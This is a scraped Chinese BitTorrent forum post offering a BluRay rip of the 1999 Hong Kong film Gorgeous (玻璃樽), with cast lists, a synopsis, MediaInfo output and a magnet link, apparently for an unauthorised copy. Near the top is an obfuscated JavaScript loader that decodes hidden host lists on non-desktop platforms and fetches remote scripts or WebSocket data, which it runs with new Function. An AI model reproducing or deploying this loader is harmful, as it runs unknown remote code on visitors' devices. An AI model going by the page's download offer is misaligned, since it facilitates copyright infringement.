玻璃樽[国粤语配音/中文字幕].Under.Control.1999.1080p.BluRay.x265.10bit.DTS.2Audio 7.69GB

版主小s 27天前 174

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 玻璃樽 / Gorgeous / Under Control
◎年  代 1999
◎产  地 中国香港 / 中国台湾
◎类  别 喜剧 / 动作 / 爱情
◎语  言 粤语 / 英语 / 汉语普通话 / 日语 / 闽南语
◎上映日期 1999-02-06(中国台湾) / 1999-02-13(中国香港)
◎IMDb链接 https://www.imdb.com/title/tt0184526/
◎豆瓣评分 6.5/10 (55507人评价)
◎豆瓣链接 https://movie.douban.com/subject/1306541/
◎片  长 121分钟
◎导  演 谷德昭 Vincent Kok (id:1025526)
◎编  剧 谷德昭 Vincent Kok (id:1025526)
       成龙 Jackie Chan (id:1054531)
       罗耀辉 Yiu Fai Lo (id:1290204)
       岸西 Ivy Ho (id:1286710)
◎演  员 成龙 Jackie Chan (id:1054531)
       舒淇 Qi Shu (id:1138320)
       梁朝伟 Tony Leung Chiu Wai (id:1115918)
       周华健 Emil Chau (id:1038045)
       任贤齐 Richie Jen (id:1009888)
       陈松勇 Sung Young Chen (id:1275063)
       金燕玲 Elaine Jin (id:1280673)
       刘以达 Tats Lau (id:1034328)
       吴君如 Sandra Ng (id:1127819)
       李灿森 Sam Lee (id:1028522)
       周星驰 Stephen Chow (id:1048026)
       田启文 Kai Man Tin (id:1315882)
       明德丰 Sherwin Ming (id:1459924)
       林雪 Suet Lam (id:1274279)
       段伟伦 William Duan (id:1419931)
       麦伟章 Wai Cheung Mak (id:1361256)
       刘一飞 Yat-Fei Lau (id:1350580)
       张小蕙 Shirley Cheung Siu-Wai (id:1335848)
       Carmen Soo 苏慧敏 (id:1318940)
       森美 Sammy Leung (id:1038992)
       卢惠光 Ken Lo (id:1032633)
       吴彦祖 Daniel Wu (id:1027502)
       谷德昭 Vincent Kok (id:1025526)
       吴辰君 Annie Wu (id:1023550)
       冯德伦 Stephen Fung (id:1023278)
       葛民辉 Eric Kot (id:1017040)
       谷祖琳 Jolane Koo (id:1045825)
       苏志威 Edmond So (id:1049196)
       王合喜 Ken Wong (id:1008281)
       张达明 Tat-Ming Cheung (id:1274433)
       李力持 Lik-Chi Lee (id:1274246)
       阮小仪 Kitty Yuen (id:1219964)
       罗家英 Kar-Ying Law (id:1108968)
       张可颐 Maggie Cheung Ho Yee (id:1073994)
       布拉德利·詹姆斯·艾伦 Bradley James Allan (id:1056473)
       雷颂德 Mark Lui (id:1052286)
       樋口明日嘉 Asuka Higuchi (id:1051169)
       成龙 Jackie Chan (id:1054531)
       陈锡康 David Chan (id:1280433)
       邹文怀 Raymond Chow (id:1016883)
       张文宝 Man Po Cheung (id:1280622)
       邝志良 Chi-Leung Kwong (id:1289164)
       张嘉辉 Ka-fai Cheung (id:1280620)
       奚仲文 Chung-Man Hai (id:1275027)
       吴里璐 Dora Ng (id:1289270)
       陈顾方 Shirley Chan (id:1280438)
       黄宏显 Eddy Wong (id:1302455)
       黄宏达 Victor Wong (id:1307421)
       罗伟豪 Wai-ho Law (id:1305817)
       成龙 Jackie Chan (id:1054531)
       李忠志 Chung Chi Li (id:1014763)
       彭皓锋 Peter Pang (id:1360665)
       罗礼贤 Bruce Law (id:1289542)

◎标  签 成龙 / 香港 / 香港电影 / 爱情 / 舒琪 / 动作 / 梁朝伟 / 玻璃樽

◎简  介
  台湾一个小渔村,女孩阿北(舒淇 饰)一直在这里过着平静的生活。直到有一天,她在海边拣到了一个由香港飘过来的玻璃樽。玻璃樽里有一张香港男孩写的纸条:“我很寂寞,你呢?”,里面还留了他的住址和联系电话。于是,阿北开始在满怀憧憬中来到香港寻找这个男孩。                                    
                                根据地址,阿北找到了男孩阿波。阿波为阿北的勇气所折服,收留了她。经过一段时间的接触,阿北惊奇地发现阿波原来是个同性恋,根本不是自己心目中的白马王子。这时,阿北遇上了心中的白马王子――金融奇才阿祥(成龙 饰)。为了接近喜欢追求刺激的阿祥,阿北谎称自己是黑社会老大的女儿。于是,一场意想不到的经历发生了。

◎获奖情况 (共2项)
  第36届台北金马影展 (1999)
  金马奖 最佳动作设计(提名)

  第19届香港电影金像奖 (2000)
  最佳动作设计(提名)
   └──成龙 (id:1054531)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 327694335993563079623663626477740823591 (0xF687A22871612C478CA556F6C0051427)
  4. Complete name                            : [email protected]DQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 7.69 GiB
  8. Duration                                 : 1 h 59 min
  9. Overall bit rate                         : 9 190 kb/s
  10. Movie name                               : Under Control 1999
  11. Encoded date                             : UTC 2021-09-20 04:34:04
  12. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit
  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  14. Cover                                    : Yes
  15. Attachments                              : cover.jpg
  16. Video
  17. ID                                       : 1
  18. Format                                   : HEVC
  19. Format/Info                              : High Efficiency Video Coding
  20. Format profile                           : Main [email protected]@Main
  21. Codec ID                                 : V_MPEGH/ISO/HEVC
  22. Duration                                 : 1 h 59 min
  23. Bit rate                                 : 7 007 kb/s
  24. Width                                    : 1 920 pixels
  25. Height                                   : 812 pixels
  26. Display aspect ratio                     : 2.35:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 24.000 FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 10 bits
  32. Bits/(Pixel*Frame)                       : 0.187
  33. Stream size                              : 5.86 GiB (76%)
  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit
  35. Encoding settings                        : rc=crf / crf=16.8000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x812 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Audio #1
  39. ID                                       : 2
  40. ID in the original source medium         : 4353 (0x1101)
  41. Format                                   : DTS
  42. Format/Info                              : Digital Theater Systems
  43. Codec ID                                 : A_DTS
  44. Duration                                 : 1 h 59 min
  45. Bit rate mode                            : Constant
  46. Bit rate                                 : 1 509 kb/s
  47. Channel(s)                               : 6 channels
  48. Channel layout                           : C L R Ls Rs LFE
  49. Sampling rate                            : 48.0 kHz
  50. Frame rate                               : 93.750 FPS (512 SPF)
  51. Bit depth                                : 16 bits
  52. Compression mode                         : Lossy
  53. Stream size                              : 1.26 GiB (16%)
  54. Title                                    : Cantonese
  55. Language                                 : Chinese
  56. Default                                  : Yes
  57. Forced                                   : No
  58. Original source medium                   : Blu-ray
  59. Audio #2
  60. ID                                       : 3
  61. ID in the original source medium         : 4354 (0x1102)
  62. Format                                   : AC-3
  63. Format/Info                              : Audio Coding 3
  64. Commercial name                          : Dolby Digital
  65. Codec ID                                 : A_AC3
  66. Duration                                 : 1 h 59 min
  67. Bit rate mode                            : Constant
  68. Bit rate                                 : 640 kb/s
  69. Channel(s)                               : 6 channels
  70. Channel layout                           : L R C LFE Ls Rs
  71. Sampling rate                            : 48.0 kHz
  72. Frame rate                               : 31.250 FPS (1536 SPF)
  73. Compression mode                         : Lossy
  74. Stream size                              : 549 MiB (7%)
  75. Title                                    : Mandarin
  76. Language                                 : Chinese
  77. Service kind                             : Complete Main
  78. Default                                  : Yes
  79. Forced                                   : No
  80. Original source medium                   : Blu-ray
  81. Text #1
  82. ID                                       : 4
  83. ID in the original source medium         : 4610 (0x1202)
  84. Format                                   : PGS
  85. Muxing mode                              : zlib
  86. Codec ID                                 : S_HDMV/PGS
  87. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  88. Duration                                 : 1 h 56 min
  89. Bit rate                                 : 28.4 kb/s
  90. Count of elements                        : 2949
  91. Stream size                              : 23.6 MiB (0%)
  92. Title                                    : chs
  93. Language                                 : Chinese
  94. Default                                  : No
  95. Forced                                   : No
  96. Original source medium                   : Blu-ray
  97. Text #2
  98. ID                                       : 5
  99. ID in the original source medium         : 4611 (0x1203)
  100. Format                                   : PGS
  101. Muxing mode                              : zlib
  102. Codec ID                                 : S_HDMV/PGS
  103. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  104. Duration                                 : 1 h 56 min
  105. Bit rate                                 : 29.1 kb/s
  106. Count of elements                        : 3094
  107. Stream size                              : 24.2 MiB (0%)
  108. Title                                    : cht
  109. Language                                 : Chinese
  110. Default                                  : No
  111. Forced                                   : No
  112. Original source medium                   : Blu-ray
  113. Menu
  114. 00:00:00.000                             : Chapter 01
  115. 00:09:27.875                             : Chapter 02
  116. 00:18:06.665                             : Chapter 03
  117. 00:28:11.750                             : Chapter 04
  118. 00:37:02.583                             : Chapter 05
  119. 00:46:36.666                             : Chapter 06
  120. 00:57:56.333                             : Chapter 07
  121. 01:08:08.041                             : Chapter 08
  122. 01:21:14.582                             : Chapter 09
  123. 01:30:45.916                             : Chapter 10
  124. 01:43:26.875                             : Chapter 11
  125. 01:50:17.125                             : Chapter 12


TAGS 动作 喜剧 爱情

磁力链:
  • magnet:?xl=24416&xt=urn:btih:F842DF8A28725E3B58220A929502E4228FCFE0D0
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖